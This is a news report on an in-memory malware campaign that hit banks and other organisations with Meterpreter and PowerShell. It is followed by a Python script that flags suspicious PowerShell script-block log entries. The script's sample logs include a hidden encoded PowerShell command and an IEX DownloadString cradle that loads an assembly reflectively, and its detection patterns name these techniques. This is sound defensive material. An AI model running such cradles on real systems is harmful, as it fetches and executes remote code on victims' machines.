Hackers are reportedly launching “invisible” memory-based malware attacks on banks, telecom firms and government agencies across the globe. Around 140 organisations across 40 countries are believed to have been affected by the secretive malware. However, given that the attacks are incredibly hard to spot, the actual number of infections may be considerably higher.
The cybercriminals behind the ongoing campaign are believed to be leveraging new and advanced attack methods to steal login credentials and financial data, while ensuring that malicious activities remain undetected.
Security researchers found that the hackers use widely available, legitimate software and tools, such as penetration-testing software and Windows PowerShell, to hide malware in victims’ computer memory in an effort to evade detection. Because the malware lives only in memory, all traces of malicious activity are removed when the system is rebooted, making it harder for security researchers and investigators to unearth evidence of an attack. According to Kaspersky Lab researchers, the US, UK, France, Ecuador and Kenya are among the top five countries most affected by the malware attacks.
“What’s interesting here is that these attacks are ongoing globally against banks themselves,” Kaspersky Lab expert Kurt Baumgartner told ArsTechnica. “The banks have not been adequately prepared in many cases to deal with this.” He went on to say that people behind the attacks are “pushing money out of the banks from within the banks,” by targeting computers that run automatic teller machines.
Unnamed banks contacted Kaspersky after discovering the Meterpreter penetration-testing software in the memory of their servers, which led researchers to uncover the new attack method. Researchers found the Meterpreter code merged with legitimate PowerShell scripts, designed to steal admin passwords and remotely control infected machines.
Researchers remain uncertain whether the attacks are being perpetrated by a single attacker or cybercriminal gang, or by several competing hacker groups. However, they note that similar methods have also been used by other prolific cybercriminal groups such as the Carbanak Gang and the GCMAN group.
“The determination of attackers to hide their activity and make detection and incident response increasingly difficult explains the latest trend of anti-forensic techniques and memory-based malware. That is why memory forensics is becoming critical to the analysis of malware and its functions,” said Sergey Golovanov, principal security researcher at Kaspersky Lab, ZDNet reported.
“In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible.”
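Since in-memory tooling leaves nothing on disk to recover after a reboot, the record that survives is what the host logged at execution time; the following added example (not code from the article or from Kaspersky) runs a simple triage over constructed PowerShell script block log lines (Event ID 4104) and flags the patterns used to stage or run code purely in memory. The log line format, the indicator list and the weights are assumptions for illustration.

```python
import re

# Constructed PowerShell script block log records (Event ID 4104), one per line. Hosts,
# users and scripts are made up for this example, not data from the incidents; the
# base64 body of the encoded command is deliberately omitted.
SAMPLE_LOGS = [
    '2017-02-08T10:01:02Z host=ws01 user=jdoe event=4104 '
    'script="Get-ChildItem C:\\Reports | Measure-Object"',
    '2017-02-08T10:03:15Z host=ws01 user=jdoe event=4104 '
    'script="powershell.exe -NoP -W Hidden -EncodedCommand <base64 omitted>"',
    '2017-02-08T10:03:16Z host=ws01 user=jdoe event=4104 '
    'script="IEX (New-Object Net.WebClient).DownloadString($u); '
    '[System.Reflection.Assembly]::Load($bytes)"',
    '2017-02-08T10:05:40Z host=fs02 user=svc_backup event=4104 '
    'script="Get-Service | Where-Object {$_.Status -eq \'Running\'}"',
]

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
                     r'event=(?P<event>\d+) script="(?P<script>.*)"$')

# (pattern, weight) per indicator. Each describes a way a script block stages or runs
# code in memory without writing a file to disk; the weights are an assumption.
INDICATORS = {
    "encoded_command": (re.compile(r"-e(c|nc|ncodedcommand)?\b", re.I), 2),
    "hidden_window":   (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 1),
    "no_profile":      (re.compile(r"-nop(rofile)?\b", re.I), 1),
    "download_cradle": (re.compile(r"(?=.*\b(iex|invoke-expression)\b)"
                                   r"(?=.*\.download(string|data)\()", re.I | re.S), 3),
    "reflective_load": (re.compile(r"reflection\.assembly\]::load\b", re.I), 3),
    "memory_api": (re.compile(r"\b(virtualalloc|writeprocessmemory|createremotethread)\b", re.I), 3),
}
ALERT_THRESHOLD = 3  # assumption: tune per environment

def score_script(script):
    """Return (score, matched indicator names) for one script block."""
    matched = [name for name, (pat, _) in INDICATORS.items() if pat.search(script)]
    return sum(INDICATORS[n][1] for n in matched), matched

def triage(lines):
    """Parse 4104-style records; return (ts, host, user, score, matched) at/above threshold."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["event"] != "4104":
            continue  # malformed or unrelated record
        score, matched = score_script(m["script"])
        if score >= ALERT_THRESHOLD:
            findings.append((m["ts"], m["host"], m["user"], score, matched))
    return findings
```

Enabling script block logging and forwarding it off-host is what makes this possible: the content is captured when the script runs, so the reboot that wipes the in-memory payload does not wipe the record.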